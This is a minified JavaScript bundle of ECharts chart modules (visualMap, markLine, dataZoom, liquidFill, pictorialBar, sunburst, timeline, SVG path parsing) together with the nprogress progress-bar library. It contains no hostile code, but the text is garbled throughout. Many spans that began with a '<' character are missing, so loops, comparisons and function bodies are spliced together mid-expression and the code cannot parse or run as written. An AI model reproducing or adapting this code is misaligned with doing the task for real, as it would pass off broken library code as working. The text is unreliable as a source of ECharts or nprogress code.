i=n("6d8b"),r=n("eaea"),o=n("3842"),a=[20,140],s=r.extend({type:"visualMap.continuous",defaultOption:{align:"auto",calculable:!1,range:null,realtime:!0,itemHeight:null,itemWidth:null,hoverLink:!0,hoverLinkDataSize:null,hoverLinkOnHandle:null},optionUpdated:function(e,t){s.superApply(this,"optionUpdated",arguments),this.resetExtent(),this.resetVisual((function(e){e.mappingMethod="linear",e.dataExtent=this.getExtent()})),this._resetRange()},resetItemSize:function(){s.superApply(this,"resetItemSize",arguments);var e=this.itemSize;"horizontal"===this._orient&&e.reverse(),(null==e[0]||isNaN(e[0]))&&(e[0]=a[0]),(null==e[1]||isNaN(e[1]))&&(e[1]=a[1])},_resetRange:function(){var e=this.getExtent(),t=this.option.range;!t||t.auto?(e.auto=1,this.option.range=e):i.isArray(t)&&(t[0]>t[1]&&t.reverse(),t[0]=Math.max(t[0],e[0]),t[1]=Math.min(t[1],e[1]))},completeVisualOption:function(){r.prototype.completeVisualOption.apply(this,arguments),i.each(this.stateList,(function(e){var t=this.option.controller[e].symbolSize;t&&t[0]!==t[1]&&(t[0]=0)}),this)},setSelected:function(e){this.option.range=e.slice(),this._resetRange()},getSelected:function(){var e=this.getExtent(),t=o.asc((this.get("range")||[]).slice());return t[0]>e[1]&&(t[0]=e[1]),t[1]>e[1]&&(t[1]=e[1]),t[0]=n[1]||e<=t[1])?"inRange":"outOfRange"},findTargetDataIndices:function(e){var t=[];return this.eachTargetSeries((function(n){var i=[],r=n.getData();r.each(this.getDataDimension(r),(function(t,n){e[0]<=t&&t<=e[1]&&i.push(n)}),this),t.push({seriesId:n.id,dataIndex:i})}),this),t},getVisualMeta:function(e){var t=l(this,"outOfRange",this.getExtent()),n=l(this,"inRange",this.option.range.slice()),i=[];function r(t,n){i.push({value:t,color:e(t,n)})}for(var o=0,a=0,s=n.length,u=t.length;a=0&&"number"===typeof u&&(u=+u.toFixed(Math.min(v,20))),g.coord[f]=m.coord[f]=u,r=[g,m,{type:s,valueIndex:r.valueIndex,value:u}]}return r=[a.dataTransform(e,r[0]),a.dataTransform(e,r[1]),i.extend({},r[2])],r[2].type=r[2].type||"",i.merge(r[2],r[0]),i.merge(r[2],r[1]),r};function d(e){return!isNaN(e)&&!isFinite(e)}function f(e,t,n,i){var r=1-e,o=i.dimensions[e];return d(t[r])&&d(n[r])&&t[e]===n[e]&&i.getAxis(o).containData(t[e])}function p(e,t){if("cartesian2d"===e.type){var n=t[0].coord,i=t[1].coord;if(n&&i&&(f(1,n,i,e)||f(0,n,i,e)))return!0}return a.dataFilter(e,t[0])&&a.dataFilter(e,t[1])}function g(e,t,n,i,r){var a,s=i.coordinateSystem,l=e.getItemModel(t),u=o.parsePercent(l.get("x"),r.getWidth()),c=o.parsePercent(l.get("y"),r.getHeight());if(isNaN(u)||isNaN(c)){if(i.getMarkerPosition)a=i.getMarkerPosition(e.getValues(e.dimensions,t));else{var h=s.dimensions,f=e.get(h[0],t),p=e.get(h[1],t);a=s.dataToPoint([f,p])}if("cartesian2d"===s.type){var g=s.getAxis("x"),m=s.getAxis("y");h=s.dimensions;d(e.get(h[0],t))?a[0]=g.toGlobalCoord(g.getExtent()[n?0:1]):d(e.get(h[1],t))&&(a[1]=m.toGlobalCoord(m.getExtent()[n?0:1]))}isNaN(u)||(a[0]=u),isNaN(c)||(a[1]=c)}else a=[u,c];e.setItemLayout(t,a)}var m=l.extend({type:"markLine",updateTransform:function(e,t,n){t.eachSeries((function(e){var t=e.markLineModel;if(t){var i=t.getData(),r=t.__from,o=t.__to;r.each((function(t){g(r,t,!0,e,n),g(o,t,!1,e,n)})),i.each((function(e){i.setItemLayout(e,[r.getItemLayout(e),o.getItemLayout(e)])})),this.markerGroupMap.get(e.id).updateLayout()}}),this)},renderSeries:function(e,t,n,r){var o=e.coordinateSystem,a=e.id,l=e.getData(),u=this.markerGroupMap,c=u.get(a)||u.set(a,new s);this.group.add(c.group);var h=v(o,e,t),d=h.from,f=h.to,p=h.line;t.__from=d,t.__to=f,t.setData(p);var m=t.get("symbol"),y=t.get("symbolSize");function _(t,n,i){var o=t.getItemModel(n);g(t,n,i,e,r),t.setItemVisual(n,{symbolRotate:o.get("symbolRotate"),symbolSize:o.get("symbolSize")||y[i?0:1],symbol:o.get("symbol",!0)||m[i?0:1],color:o.get("itemStyle.color")||l.getVisual("color")})}i.isArray(m)||(m=[m,m]),"number"===typeof y&&(y=[y,y]),h.from.each((function(e){_(d,e,!0),_(f,e,!1)})),p.each((function(e){var t=p.getItemModel(e).get("lineStyle.color");p.setItemVisual(e,{color:t||d.getItemVisual(e,"color")}),p.setItemLayout(e,[d.getItemLayout(e),f.getItemLayout(e)]),p.setItemVisual(e,{fromSymbolRotate:d.getItemVisual(e,"symbolRotate"),fromSymbolSize:d.getItemVisual(e,"symbolSize"),fromSymbol:d.getItemVisual(e,"symbol"),toSymbolRotate:f.getItemVisual(e,"symbolRotate"),toSymbolSize:f.getItemVisual(e,"symbolSize"),toSymbol:f.getItemVisual(e,"symbol")})})),c.updateData(p),h.line.eachItemGraphicEl((function(e,n){e.traverse((function(e){e.dataModel=t}))})),c.__keep=!0,c.group.silent=t.get("silent")||e.get("silent")}});function v(e,t,n){var o;o=e?i.map(e&&e.dimensions,(function(e){var n=t.getData().getDimensionInfo(t.getData().mapDimension(e))||{};return i.defaults({name:e},n)})):[{name:"value",type:"float"}];var s=new r(o,n),l=new r(o,n),u=new r([],n),c=i.map(n.get("data"),i.curry(h,t,e,n));e&&(c=i.filter(c,i.curry(p,e)));var d=e?a.dimValueGetter:function(e){return e.value};return s.initData(i.map(c,(function(e){return e[0]})),null,d),l.initData(i.map(c,(function(e){return e[1]})),null,d),u.initData(i.map(c,(function(e){return e[2]}))),u.hasItemOption=!0,{from:s,to:l,line:u}}e.exports=m},"30a3":function(e,t,n){var i=n("6d8b"),r=n("607d"),o=r.Dispatcher,a=n("98b7"),s=n("06ad"),l=function(e){e=e||{},this.stage=e.stage||{},this.onframe=e.onframe||function(){},this._clips=[],this._running=!1,this._time,this._pausedTime,this._pauseStart,this._paused=!1,o.call(this)};l.prototype={constructor:l,addClip:function(e){this._clips.push(e)},addAnimator:function(e){e.animation=this;for(var t=e.getClips(),n=0;n=0&&this._clips.splice(t,1)},removeAnimator:function(e){for(var t=e.getClips(),n=0;n
'};function n(e,t,n){return en?n:e}function i(e){return 100*(-1+e)}function r(e,n,r){var o;return o="translate3d"===t.positionUsing?{transform:"translate3d("+i(e)+"%,0,0)"}:"translate"===t.positionUsing?{transform:"translate("+i(e)+"%,0)"}:{"margin-left":i(e)+"%"},o.transition="all "+n+"ms "+r,o}e.configure=function(e){var n,i;for(n in e)i=e[n],void 0!==i&&e.hasOwnProperty(n)&&(t[n]=i);return this},e.status=null,e.set=function(i){var s=e.isStarted();i=n(i,t.minimum,1),e.status=1===i?null:i;var l=e.render(!s),u=l.querySelector(t.barSelector),c=t.speed,h=t.easing;return l.offsetWidth,o((function(n){""===t.positionUsing&&(t.positionUsing=e.getPositioningCSS()),a(u,r(i,c,h)),1===i?(a(l,{transition:"none",opacity:1}),l.offsetWidth,setTimeout((function(){a(l,{transition:"all "+c+"ms linear",opacity:0}),setTimeout((function(){e.remove(),n()}),c)}),c)):setTimeout(n,c)})),this},e.isStarted=function(){return"number"===typeof e.status},e.start=function(){e.status||e.set(0);var n=function(){setTimeout((function(){e.status&&(e.trickle(),n())}),t.trickleSpeed)};return t.trickle&&n(),this},e.done=function(t){return t||e.status?e.inc(.3+.5*Math.random()).set(1):this},e.inc=function(t){var i=e.status;return i?("number"!==typeof t&&(t=(1-i)*n(Math.random()*i,.1,.95)),i=n(i+t,0,.994),e.set(i)):e.start()},e.trickle=function(){return e.inc(Math.random()*t.trickleRate)},function(){var t=0,n=0;e.promise=function(i){return i&&"resolved"!==i.state()?(0===n&&e.start(),t++,n++,i.always((function(){n--,0===n?(t=0,e.done()):e.set((t-n)/t)})),this):this}}(),e.render=function(n){if(e.isRendered())return document.getElementById("nprogress");l(document.documentElement,"nprogress-busy");var r=document.createElement("div");r.id="nprogress",r.innerHTML=t.template;var o,s=r.querySelector(t.barSelector),u=n?"-100":i(e.status||0),c=document.querySelector(t.parent);return a(s,{transition:"all 0 linear",transform:"translate3d("+u+"%,0,0)"}),t.showSpinner||(o=r.querySelector(t.spinnerSelector),o&&h(o)),c!=document.body&&l(c,"nprogress-custom-parent"),c.appendChild(r),r},e.remove=function(){u(document.documentElement,"nprogress-busy"),u(document.querySelector(t.parent),"nprogress-custom-parent");var e=document.getElementById("nprogress");e&&h(e)},e.isRendered=function(){return!!document.getElementById("nprogress")},e.getPositioningCSS=function(){var e=document.body.style,t="WebkitTransform"in e?"Webkit":"MozTransform"in e?"Moz":"msTransform"in e?"ms":"OTransform"in e?"O":"";return t+"Perspective"in e?"translate3d":t+"Transform"in e?"translate":"margin"};var o=function(){var e=[];function t(){var n=e.shift();n&&n(t)}return function(n){e.push(n),1==e.length&&t()}}(),a=function(){var e=["Webkit","O","Moz","ms"],t={};function n(e){return e.replace(/^-ms-/,"ms-").replace(/-([\da-z])/gi,(function(e,t){return t.toUpperCase()}))}function i(t){var n=document.body.style;if(t in n)return t;var i,r=e.length,o=t.charAt(0).toUpperCase()+t.slice(1);while(r--)if(i=e[r]+o,i in n)return i;return t}function r(e){return e=n(e),t[e]||(t[e]=i(e))}function o(e,t,n){t=r(t),e.style[t]=n}return function(e,t){var n,i,r=arguments;if(2==r.length)for(n in t)i=t[n],void 0!==i&&t.hasOwnProperty(n)&&o(e,n,i);else o(e,r[1],r[2])}}();function s(e,t){var n="string"==typeof e?e:c(e);return n.indexOf(" "+t+" ")>=0}function l(e,t){var n=c(e),i=n+t;s(n,t)||(e.className=i.substring(1))}function u(e,t){var n,i=c(e);s(e,t)&&(n=i.replace(" "+t+" "," "),e.className=n.substring(1,n.length-1))}function c(e){return(" "+(e.className||"")+" ").replace(/\s+/gi," ")}function h(e){e&&e.parentNode&&e.parentNode.removeChild(e)}return e}))},"32a1":function(e,t,n){var i=n("6d8b"),r=n("7dcf"),o=n("ef6a"),a=n("5576"),s=i.bind,l=r.extend({type:"dataZoom.inside",init:function(e,t){this._range},render:function(e,t,n,r){l.superApply(this,"render",arguments),this._range=e.getPercentRange(),i.each(this.getTargetCoordInfo(),(function(t,r){var o=i.map(t,(function(e){return a.generateCoordId(e.model)}));i.each(t,(function(t){var l=t.model,c={};i.each(["pan","zoom","scrollMove"],(function(e){c[e]=s(u[e],this,t,r)}),this),a.register(n,{coordId:a.generateCoordId(l),allCoordIds:o,containsPoint:function(e,t,n){return l.coordinateSystem.containPoint([t,n])},dataZoomId:e.id,dataZoomModel:e,getRange:c})}),this)}),this)},dispose:function(){a.unregister(this.api,this.dataZoomModel.id),l.superApply(this,"dispose",arguments),this._range=null}}),u={zoom:function(e,t,n,i){var r=this._range,a=r.slice(),s=e.axisModels[0];if(s){var l=h[t](null,[i.originX,i.originY],s,n,e),u=(l.signal>0?l.pixelStart+l.pixelLength-l.pixel:l.pixel-l.pixelStart)/l.pixelLength*(a[1]-a[0])+a[0],c=Math.max(1/i.scale,0);a[0]=(a[0]-u)*c+u,a[1]=(a[1]-u)*c+u;var d=this.dataZoomModel.findRepresentativeAxisProxy().getMinMaxSpan();return o(0,a,[0,100],0,d.minSpan,d.maxSpan),this._range=a,r[0]!==a[0]||r[1]!==a[1]?a:void 0}},pan:c((function(e,t,n,i,r,o){var a=h[i]([o.oldX,o.oldY],[o.newX,o.newY],t,r,n);return a.signal*(e[1]-e[0])*a.pixel/a.pixelLength})),scrollMove:c((function(e,t,n,i,r,o){var a=h[i]([0,0],[o.scrollDelta,o.scrollDelta],t,r,n);return a.signal*(e[1]-e[0])*o.scrollDelta}))};function c(e){return function(t,n,i,r){var a=this._range,s=a.slice(),l=t.axisModels[0];if(l){var u=e(s,l,t,n,i,r);return o(u,s,[0,100],"all"),this._range=s,a[0]!==s[0]||a[1]!==s[1]?s:void 0}}}var h={grid:function(e,t,n,i,r){var o=n.axis,a={},s=r.model.coordinateSystem.getRect();return e=e||[0,0],"x"===o.dim?(a.pixel=t[0]-e[0],a.pixelLength=s.width,a.pixelStart=s.x,a.signal=o.inverse?1:-1):(a.pixel=t[1]-e[1],a.pixelLength=s.height,a.pixelStart=s.y,a.signal=o.inverse?-1:1),a},polar:function(e,t,n,i,r){var o=n.axis,a={},s=r.model.coordinateSystem,l=s.getRadiusAxis().getExtent(),u=s.getAngleAxis().getExtent();return e=e?s.pointToCoord(e):[0,0],t=s.pointToCoord(t),"radiusAxis"===n.mainType?(a.pixel=t[0]-e[0],a.pixelLength=l[1]-l[0],a.pixelStart=l[0],a.signal=o.inverse?1:-1):(a.pixel=t[1]-e[1],a.pixelLength=u[1]-u[0],a.pixelStart=u[0],a.signal=o.inverse?-1:1),a},singleAxis:function(e,t,n,i,r){var o=n.axis,a=r.model.coordinateSystem.getRect(),s={};return e=e||[0,0],"horizontal"===o.orient?(s.pixel=t[0]-e[0],s.pixelLength=a.width,s.pixelStart=a.x,s.signal=o.inverse?1:-1):(s.pixel=t[1]-e[1],s.pixelLength=a.height,s.pixelStart=a.y,s.signal=o.inverse?-1:1),s}},d=l;e.exports=d},"32f8":function(e,t,n){var i=n("862d"),r=n("3eba");r.extendSeriesModel({type:"series.liquidFill",visualColorAccessPath:"textStyle.normal.color",optionUpdated:function(){var e=this.option;e.gridSize=Math.max(Math.floor(e.gridSize),4)},getInitialData:function(e,t){var n=i(["value"],e.data),o=new r.List(n,this);return o.initData(e.data),o},defaultOption:{color:["#294D99","#156ACF","#1598ED","#45BDFF"],center:["50%","50%"],radius:"50%",amplitude:"8%",waveLength:"80%",phase:"auto",period:"auto",direction:"right",shape:"circle",waveAnimation:!0,animationEasing:"linear",animationEasingUpdate:"linear",animationDuration:2e3,animationDurationUpdate:1e3,outline:{show:!0,borderDistance:8,itemStyle:{color:"none",borderColor:"#294D99",borderWidth:8,shadowBlur:20,shadowColor:"rgba(0, 0, 0, 0.25)"}},backgroundStyle:{color:"#E3F7FF"},itemStyle:{opacity:.95,shadowBlur:50,shadowColor:"rgba(0, 0, 0, 0.4)"},label:{show:!0,color:"#294D99",insideColor:"#fff",fontSize:50,fontWeight:"bold",align:"center",baseline:"middle",position:"inside"},emphasis:{itemStyle:{opacity:.8}}}})},3301:function(e,t,n){var i=n("6d8b"),r=n("6179"),o=n("b1d4"),a=n("93d0"),s=a.SOURCE_FORMAT_ORIGINAL,l=n("2f45"),u=l.getDimensionTypeByAxis,c=n("e0d3"),h=c.getDataItemValue,d=n("2039"),f=n("8b7f"),p=f.getCoordSysInfoBySeries,g=n("ec6f"),m=n("ee1a"),v=m.enableDataStack,y=n("0f99"),_=y.makeSeriesEncodeForAxisCoordSys;function b(e,t,n){n=n||{},g.isInstance(e)||(e=g.seriesDataToSource(e));var a,s=t.get("coordinateSystem"),l=d.get(s),c=p(t);c&&(a=i.map(c.coordSysDims,(function(e){var t={name:e},n=c.axisMap.get(e);if(n){var i=n.get("type");t.type=u(i)}return t}))),a||(a=l&&(l.getDimensionsInfo?l.getDimensionsInfo():l.dimensions.slice())||["x","y"]);var h,f,m=o(e,{coordDimensions:a,generateCoord:n.generateCoord,encodeDefaulter:n.useEncodeDefaulter?i.curry(_,a,t):null});c&&i.each(m,(function(e,t){var n=e.coordDim,i=c.categoryAxisMap.get(n);i&&(null==h&&(h=t),e.ordinalMeta=i.getOrdinalMeta()),null!=e.otherDims.itemName&&(f=!0)})),f||null==h||(m[h].otherDims.itemName=0);var y=v(t,m),b=new r(m,t);b.setCalculationInfo(y);var w=null!=h&&x(e)?function(e,t,n,i){return i===h?n:this.defaultDimValueGetter(e,t,n,i)}:null;return b.hasItemOption=!1,b.initData(e,null,w),b}function x(e){if(e.sourceFormat===s){var t=w(e.data||[]);return null!=t&&!i.isArray(h(t))}}function w(e){var t=0;while(t0?1:a<0?-1:0}function _(e,t){return e.toGlobalCoord(e.dataToCoord(e.scale.parse(t)))}function b(e,t,n,i,o,a,s,l,c,h){var d=c.valueDim,f=c.categoryDim,p=Math.abs(n[f.wh]),g=e.getItemVisual(t,"symbolSize");r.isArray(g)?g=g.slice():(null==g&&(g="100%"),g=[g,g]),g[f.index]=u(g[f.index],p),g[d.index]=u(g[d.index],i?p:Math.abs(a)),h.symbolSize=g;var m=h.symbolScale=[g[0]/l,g[1]/l];m[d.index]*=(c.isHorizontal?-1:1)*s}function x(e,t,n,i,r){var o=e.get(f)||0;o&&(g.attr({scale:t.slice(),rotation:n}),g.updateTransform(),o/=g.getLineScale(),o*=t[i.valueDim.index]),r.valueLineWidth=o}function w(e,t,n,i,o,a,s,l,h,d,f,p){var g=f.categoryDim,m=f.valueDim,v=p.pxSign,y=Math.max(t[m.index]+l,0),_=y;if(i){var b=Math.abs(h),x=r.retrieve(e.get("symbolMargin"),"15%")+"",w=!1;x.lastIndexOf("!")===x.length-1&&(w=!0,x=x.slice(0,x.length-1)),x=u(x,t[m.index]);var k=Math.max(y+2*x,0),S=w?0:2*x,M=c(i),A=M?i:V((b+S)/k),C=b-A*y;x=C/2/(w?A:A-1),k=y+2*x,S=w?0:2*x,M||"fixed"===i||(A=d?V((Math.abs(d)+S)/k):0),_=A*k-S,p.repeatTimes=A,p.symbolMargin=x}var T=v*(_/2),I=p.pathPosition=[];I[g.index]=n[g.wh]/2,I[m.index]="start"===s?T:"end"===s?h-T:h/2,a&&(I[0]+=a[0],I[1]+=a[1]);var D=p.bundlePosition=[];D[g.index]=n[g.xy],D[m.index]=n[m.xy];var L=p.barRectShape=r.extend({},n);L[m.wh]=v*Math.max(Math.abs(n[m.wh]),Math.abs(I[m.index]+T)),L[g.wh]=n[g.wh];var E=p.clipShape={};E[g.xy]=-n[g.xy],E[g.wh]=f.ecSize[g.wh],E[m.xy]=0,E[m.wh]=n[m.wh]}function k(e){var t=e.symbolPatternSize,n=s(e.symbolType,-t/2,-t/2,t,t,e.color);return n.attr({culling:!0}),"image"!==n.type&&n.setStyle({strokeNoScale:!0}),n}function S(e,t,n,i){var r=e.__pictorialBundle,o=n.symbolSize,a=n.valueLineWidth,s=n.pathPosition,l=t.valueDim,u=n.repeatTimes||0,c=0,h=o[t.valueDim.index]+a+2*n.symbolMargin;for(N(e,(function(e){e.__pictorialAnimationIndex=c,e.__pictorialRepeatTimes=u,c0:i<0)&&(r=u-1-e),t[l.index]=h*(r-u/2+.5)+s[l.index],{position:t,scale:n.symbolScale.slice(),rotation:n.rotation}}function g(){N(e,(function(e){e.trigger("emphasis")}))}function m(){N(e,(function(e){e.trigger("normal")}))}}function M(e,t,n,i){var r=e.__pictorialBundle,o=e.__pictorialMainPath;function a(){this.trigger("emphasis")}function s(){this.trigger("normal")}o?z(o,null,{position:n.pathPosition.slice(),scale:n.symbolScale.slice(),rotation:n.rotation},n,i):(o=e.__pictorialMainPath=k(n),r.add(o),z(o,{position:n.pathPosition.slice(),scale:[0,0],rotation:n.rotation},{scale:n.symbolScale.slice()},n,i),o.on("mouseover",a).on("mouseout",s)),L(o,n)}function A(e,t,n){var i=r.extend({},t.barRectShape),a=e.__pictorialBarRect;a?z(a,null,{shape:i},t,n):(a=e.__pictorialBarRect=new o.Rect({z2:2,shape:i,silent:!0,style:{stroke:"transparent",fill:"transparent",lineWidth:0}}),e.add(a))}function C(e,t,n,i){if(n.symbolClip){var a=e.__pictorialClipPath,s=r.extend({},n.clipShape),l=t.valueDim,u=n.animationModel,c=n.dataIndex;if(a)o.updateProps(a,{shape:s},u,c);else{s[l.wh]=0,a=new o.Rect({shape:s}),e.__pictorialBundle.setClipPath(a),e.__pictorialClipPath=a;var h={};h[l.wh]=n.clipShape[l.wh],o[i?"updateProps":"initProps"](a,{shape:h},u,c)}}}function T(e,t){var n=e.getItemModel(t);return n.getAnimationDelayParams=I,n.isAnimationEnabled=D,n}function I(e){return{index:e.__pictorialAnimationIndex,count:e.__pictorialRepeatTimes}}function D(){return this.parentModel.isAnimationEnabled()&&!!this.getShallow("animation")}function L(e,t){e.off("emphasis").off("normal");var n=t.symbolScale.slice();t.hoverAnimation&&e.on("emphasis",(function(){this.animateTo({scale:[1.1*n[0],1.1*n[1]]},400,"elasticOut")})).on("normal",(function(){this.animateTo({scale:n.slice()},400,"elasticOut")}))}function E(e,t,n,i){var r=new o.Group,a=new o.Group;return r.add(a),r.__pictorialBundle=a,a.attr("position",n.bundlePosition.slice()),n.symbolRepeat?S(r,t,n):M(r,t,n),A(r,n,i),C(r,t,n,i),r.__pictorialShapeStr=R(e,n),r.__pictorialSymbolMeta=n,r}function O(e,t,n){var i=n.animationModel,r=n.dataIndex,a=e.__pictorialBundle;o.updateProps(a,{position:n.bundlePosition.slice()},i,r),n.symbolRepeat?S(e,t,n,!0):M(e,t,n,!0),A(e,n,!0),C(e,t,n,!0)}function P(e,t,n,i){var a=i.__pictorialBarRect;a&&(a.style.text=null);var s=[];N(i,(function(e){s.push(e)})),i.__pictorialMainPath&&s.push(i.__pictorialMainPath),i.__pictorialClipPath&&(n=null),r.each(s,(function(e){o.updateProps(e,{scale:[0,0]},n,t,(function(){i.parent&&i.parent.remove(i)}))})),e.setItemGraphicEl(t,null)}function R(e,t){return[e.getItemVisual(t.dataIndex,"symbol")||"none",!!t.symbolRepeat,!!t.symbolClip].join(":")}function N(e,t,n){r.each(e.__pictorialBundle.children(),(function(i){i!==e.__pictorialBarRect&&t.call(n,i)}))}function z(e,t,n,i,r,a){t&&e.attr(t),i.symbolClip&&!r?n&&e.attr(n):n&&o[r?"updateProps":"initProps"](e,n,i.animationModel,i.dataIndex,a)}function F(e,t,n){var i=n.color,a=n.dataIndex,s=n.itemModel,l=s.getModel("itemStyle").getItemStyle(["color"]),u=s.getModel("emphasis.itemStyle").getItemStyle(),c=s.getShallow("cursor");N(e,(function(e){e.setColor(i),e.setStyle(r.defaults({fill:i,opacity:n.opacity},l)),o.setHoverStyle(e,u),c&&(e.cursor=c),e.z2=n.z2}));var h={},f=t.valueDim.posDesc[+(n.boundingLength>0)],p=e.__pictorialBarRect;d(p.style,h,s,i,t.seriesModel,a,f),o.setHoverStyle(p,h)}function V(e){var t=Math.round(e);return Math.abs(e-t)<1e-4?t:Math.ceil(e)}var B=m;e.exports=B},3397:function(e,t,n){var i=n("7a41");e.exports=function(e,t){if(!i(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!i(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!i(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!i(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}},"340d":function(e,t,n){var i=n("6d8b"),r=n("e887"),o=n("4e47"),a=n("80f0"),s=n("eda2"),l=s.windowOpen,u="sunburstRootToNode",c=r.extend({type:"sunburst",init:function(){},render:function(e,t,n,r){var s=this;this.seriesModel=e,this.api=n,this.ecModel=t;var l=e.getData(),u=l.tree.root,c=e.getViewRoot(),h=this.group,d=e.get("renderLabelForZeroData"),f=[];c.eachNode((function(e){f.push(e)}));var p=this._oldChildren||[];if(v(f,p),b(u,c),r&&r.highlight&&r.highlight.piece){var g=e.getShallow("highlightPolicy");r.highlight.piece.onEmphasis(g)}else if(r&&r.unhighlight){var m=this.virtualPiece;!m&&u.children.length&&(m=u.children[0].piece),m&&m.onNormal()}function v(e,t){function n(e){return e.getId()}function r(n,i){var r=null==n?null:e[n],o=null==i?null:t[i];y(r,o)}0===e.length&&0===t.length||new a(t,e,n,n).add(r).update(r).remove(i.curry(r,null)).execute()}function y(n,i){if(d||!n||n.getValue()||(n=null),n!==u&&i!==u)if(i&&i.piece)n?(i.piece.updateData(!1,n,"normal",e,t),l.setItemGraphicEl(n.dataIndex,i.piece)):_(i);else if(n){var r=new o(n,e,t);h.add(r),l.setItemGraphicEl(n.dataIndex,r)}}function _(e){e&&e.piece&&(h.remove(e.piece),e.piece=null)}function b(n,i){if(i.depth>0){s.virtualPiece?s.virtualPiece.updateData(!1,n,"normal",e,t):(s.virtualPiece=new o(n,e,t),h.add(s.virtualPiece)),i.piece._onclickEvent&&i.piece.off("click",i.piece._onclickEvent);var r=function(e){s._rootToNode(i.parentNode)};i.piece._onclickEvent=r,s.virtualPiece.on("click",r)}else s.virtualPiece&&(h.remove(s.virtualPiece),s.virtualPiece=null)}this._initEvents(),this._oldChildren=f},dispose:function(){},_initEvents:function(){var e=this,t=function(t){var n=!1,i=e.seriesModel.getViewRoot();i.eachNode((function(i){if(!n&&i.piece&&i.piece.childAt(0)===t.target){var r=i.getModel().get("nodeClick");if("rootToNode"===r)e._rootToNode(i);else if("link"===r){var o=i.getModel(),a=o.get("link");if(a){var s=o.get("target",!0)||"_blank";l(a,s)}}n=!0}}))};this.group._onclickEvent&&this.group.off("click",this.group._onclickEvent),this.group.on("click",t),this.group._onclickEvent=t},_rootToNode:function(e){e!==this.seriesModel.getViewRoot()&&this.api.dispatchAction({type:u,from:this.uid,seriesId:this.seriesModel.id,targetNode:e})},containPoint:function(e,t){var n=t.getData(),i=n.getItemLayout(0);if(i){var r=e[0]-i.cx,o=e[1]-i.cy,a=Math.sqrt(r*r+o*o);return a<=i.r&&a>=i.r0}}}),h=c;e.exports=h},"342d":function(e,t,n){var i=n("cbe5"),r=n("20c8"),o=n("ee84"),a=Math.sqrt,s=Math.sin,l=Math.cos,u=Math.PI,c=function(e){return Math.sqrt(e[0]*e[0]+e[1]*e[1])},h=function(e,t){return(e[0]*t[0]+e[1]*t[1])/(c(e)*c(t))},d=function(e,t){return(e[0]*t[1]1&&(c*=a(b),f*=a(b));var x=(r===o?-1:1)*a((c*c*(f*f)-c*c*(_*_)-f*f*(y*y))/(c*c*(_*_)+f*f*(y*y)))||0,w=x*c*_/f,k=x*-f*y/c,S=(e+n)/2+l(v)*w-s(v)*k,M=(t+i)/2+s(v)*w+l(v)*k,A=d([1,0],[(y-w)/c,(_-k)/f]),C=[(y-w)/c,(_-k)/f],T=[(-1*y-w)/c,(-1*_-k)/f],I=d(C,T);h(C,T)<=-1&&(I=u),h(C,T)>=1&&(I=0),0===o&&I>0&&(I-=2*u),1===o&&I<0&&(I+=2*u),m.addData(g,S,M,c,f,A,I,v,o)}var p=/([mlvhzcqtsa])([^mlvhzcqtsa]*)/gi,g=/-?([0-9]*\.)?[0-9]+([eE]-?[0-9]+)?/g;function m(e){if(!e)return new r;for(var t,n=0,i=0,o=n,a=i,s=new r,l=r.CMD,u=e.match(p),c=0;c=0||"+"===n?"left":"right"},c={horizontal:n>=0||"+"===n?"top":"bottom",vertical:"middle"},h={horizontal:0,vertical:y/2},d="vertical"===i?r.height:r.width,f=e.getModel("controlStyle"),p=f.get("show",!0),g=p?f.get("itemSize"):0,m=p?f.get("itemGap"):0,v=g+m,_=e.get("label.rotate")||0;_=_*y/180;var x=f.get("position",!0),w=p&&f.get("showPlayBtn",!0),k=p&&f.get("showPrevBtn",!0),S=p&&f.get("showNextBtn",!0),M=0,A=d;return"left"===x||"bottom"===x?(w&&(o=[0,0],M+=v),k&&(a=[M,0],M+=v),S&&(s=[A-g,0],A-=v)):(w&&(o=[A-g,0],A-=v),k&&(a=[0,0],M+=v),S&&(s=[A-g,0],A-=v)),l=[M,A],e.get("inverse")&&l.reverse(),{viewRect:r,mainLength:d,orient:i,rotation:h[i],labelRotation:_,labelPosOpt:n,labelAlign:e.get("label.align")||u[i],labelBaseline:e.get("label.verticalAlign")||e.get("label.baseline")||c[i],playPosition:o,prevBtnPosition:a,nextBtnPosition:s,axisExtent:l,controlSize:g,controlGap:m}},_position:function(e,t){var n=this._mainGroup,i=this._labelGroup,r=e.viewRect;if("vertical"===e.orient){var a=o.create(),s=r.x,l=r.y+r.height;o.translate(a,a,[-s,-l]),o.rotate(a,a,-y/2),o.translate(a,a,[s,l]),r=r.clone(),r.applyTransform(a)}var u=v(r),c=v(n.getBoundingRect()),h=v(i.getBoundingRect()),d=n.position,f=i.position;f[0]=d[0]=u[0][0];var p=e.labelPosOpt;if(isNaN(p)){var g="+"===p?0:1;_(d,c,u,1,g),_(f,h,u,1,1-g)}else{g=p>=0?0:1;_(d,c,u,1,g),f[1]=d[1]+p}function m(e){var t=e.position;e.origin=[u[0][0]-t[0],u[1][0]-t[1]]}function v(e){return[[e.x,e.x+e.width],[e.y,e.y+e.height]]}function _(e,t,n,i,r){e[i]+=n[i][r]-t[i][r]}n.attr("position",d),i.attr("position",f),n.rotation=i.rotation=e.rotation,m(n),m(i)},_createAxis:function(e,t){var n=t.getData(),i=t.get("axisType"),r=d.createScaleByModel(t,i);r.getTicks=function(){return n.mapArray(["value"],(function(e){return e}))};var o=n.getDataExtent("value");r.setExtent(o[0],o[1]),r.niceTicks();var a=new u("value",r,e.axisExtent,i);return a.model=t,a},_createGroup:function(e){var t=this["_"+e]=new a.Group;return this.group.add(t),t},_renderAxisLine:function(e,t,n,r){var o=n.getExtent();r.get("lineStyle.show")&&t.add(new a.Line({shape:{x1:o[0],y1:0,x2:o[1],y2:0},style:i.extend({lineCap:"round"},r.getModel("lineStyle").getLineStyle()),silent:!0,z2:1}))},_renderAxisTick:function(e,t,n,i){var r=i.getData(),o=n.scale.getTicks();v(o,(function(e){var o=n.dataToCoord(e),s=r.getItemModel(e),l=s.getModel("itemStyle"),u=s.getModel("emphasis.itemStyle"),c={position:[o,0],onclick:m(this._changeTimeline,this,e)},h=w(s,l,t,c);a.setHoverStyle(h,u.getItemStyle()),s.get("tooltip")?(h.dataIndex=e,h.dataModel=i):h.dataIndex=h.dataModel=null}),this)},_renderAxisLabel:function(e,t,n,i){var r=n.getLabelModel();if(r.get("show")){var o=i.getData(),s=n.getViewLabels();v(s,(function(i){var 